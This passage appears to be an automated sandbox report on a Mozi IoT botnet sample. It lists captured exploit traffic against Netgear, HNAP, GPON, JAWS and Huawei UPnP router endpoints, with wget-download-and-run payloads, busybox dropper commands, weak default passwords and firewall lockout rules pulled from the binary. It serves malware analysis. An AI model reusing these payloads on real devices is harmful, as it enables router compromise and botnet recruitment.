xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 133.137.248.191:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: /tmp/MGuvcs6Ocz (PID: 4622)Socket: 0.0.0.0::44343
                Source: unknownTCP traffic detected without corresponding DNS query: 121.130.248.221
                Source: unknownTCP traffic detected without corresponding DNS query: 71.181.75.105
                Source: unknownTCP traffic detected without corresponding DNS query: 168.27.245.114
                Source: unknownTCP traffic detected without corresponding DNS query: 87.83.202.29
                Source: unknownTCP traffic detected without corresponding DNS query: 137.88.31.213
                Source: unknownTCP traffic detected without corresponding DNS query: 48.145.90.179
                Source: unknownTCP traffic detected without corresponding DNS query: 157.46.152.22
                Source: unknownTCP traffic detected without corresponding DNS query: 219.143.155.172
                Source: unknownTCP traffic detected without corresponding DNS query: 24.81.183.180
                Source: unknownTCP traffic detected without corresponding DNS query: 11.140.34.223
                Source: unknownTCP traffic detected without corresponding DNS query: 71.11.190.90
                Source: unknownTCP traffic detected without corresponding DNS query: 191.250.144.46
                Source: unknownTCP traffic detected without corresponding DNS query: 37.215.228.246
                Source: unknownTCP traffic detected without corresponding DNS query: 205.51.33.91
                Source: unknownTCP traffic detected without corresponding DNS query: 103.102.254.14
                Source: unknownTCP traffic detected without corresponding DNS query: 154.136.201.94
                Source: unknownTCP traffic detected without corresponding DNS query: 204.189.67.153
                Source: unknownTCP traffic detected without corresponding DNS query: 164.142.55.184
                Source: unknownTCP traffic detected without corresponding DNS query: 15.51.212.241
                Source: unknownTCP traffic detected without corresponding DNS query: 7.224.163.250
                Source: unknownTCP traffic detected without corresponding DNS query: 118.114.67.42
                Source: unknownTCP traffic detected without corresponding DNS query: 57.163.20.143
                Source: unknownTCP traffic detected without corresponding DNS query: 193.22.15.210
                Source: unknownTCP traffic detected without corresponding DNS query: 94.185.176.145
                Source: unknownTCP traffic detected without corresponding DNS query: 78.27.98.91
                Source: unknownTCP traffic detected without corresponding DNS query: 36.54.249.217
                Source: unknownTCP traffic detected without corresponding DNS query: 160.226.225.149
                Source: unknownTCP traffic detected without corresponding DNS query: 184.235.140.0
                Source: unknownTCP traffic detected without corresponding DNS query: 130.140.7.168
                Source: unknownTCP traffic detected without corresponding DNS query: 131.112.27.0
                Source: unknownTCP traffic detected without corresponding DNS query: 184.49.220.2
                Source: unknownTCP traffic detected without corresponding DNS query: 166.216.172.210
                Source: unknownTCP traffic detected without corresponding DNS query: 98.135.167.186
                Source: unknownTCP traffic detected without corresponding DNS query: 2.99.233.91
                Source: unknownTCP traffic detected without corresponding DNS query: 211.105.77.124
                Source: unknownTCP traffic detected without corresponding DNS query: 103.186.65.125
                Source: unknownTCP traffic detected without corresponding DNS query: 1.172.219.187
                Source: unknownTCP traffic detected without corresponding DNS query: 50.192.24.84
                Source: unknownTCP traffic detected without corresponding DNS query: 58.244.219.70
                Source: unknownTCP traffic detected without corresponding DNS query: 7.177.190.112
                Source: unknownTCP traffic detected without corresponding DNS query: 88.91.75.33
                Source: unknownTCP traffic detected without corresponding DNS query: 163.206.226.193
                Source: unknownTCP traffic detected without corresponding DNS query: 134.67.11.73
                Source: unknownTCP traffic detected without corresponding DNS query: 30.115.123.158
                Source: unknownTCP traffic detected without corresponding DNS query: 12.220.127.50
                Source: unknownTCP traffic detected without corresponding DNS query: 51.78.124.189
                Source: unknownTCP traffic detected without corresponding DNS query: 212.212.35.40
                Source: unknownTCP traffic detected without corresponding DNS query: 32.39.252.126
                Source: unknownTCP traffic detected without corresponding DNS query: 15.178.136.128
                Source: unknownTCP traffic detected without corresponding DNS query: 92.69.32.77
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.226.101.83:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 99.192.234.217:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 185.29.123.11:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.207.67.88:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.217.112.105:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.76.236.93:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 79.171.18.106:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.90.79.101:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
                Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Apr 2021 18:59:02 GMTServer: Apache/2.4.41 ()Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.a;chmod
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.a;sh$
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.m
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.m;
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.m;$
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/bin.sh
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/bin.sh;chmod
                Source: MGuvcs6OczString found in binary or memory: http://127.0.0.1
                Source: MGuvcs6OczString found in binary or memory: http://127.0.0.1sendcmd
                Source: MGuvcs6OczString found in binary or memory: http://HTTP/1.1
                Source: MGuvcs6OczString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                Source: .config.8.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                Source: MGuvcs6OczString found in binary or memory: http://ipinfo.io/ip
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca)
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                Source: MGuvcs6OczString found in binary or memory: http://purenetworks.com/HNAP1/
                Source: MGuvcs6OczString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: MGuvcs6OczString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: MGuvcs6OczString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca/upload.php
                Source: /tmp/MGuvcs6Ocz (PID: 4599)HTML file containing JavaScript created: /usr/networksJump to dropped file
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                Source: Initial sampleString containing potential weak password found: admin
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: 123456
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: 12345
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial samplePotential command found: POST /cdn-cgi/
                Source: Initial samplePotential command found: GET /c HTTP/1.0
                Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
                Source: Initial samplePotential command found: GET %s HTTP/1.1
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
                Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
                Source: Initial samplePotential command found: mount -o remount,rw /overlay /
                Source: Initial samplePotential command found: mv -f %s %s
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
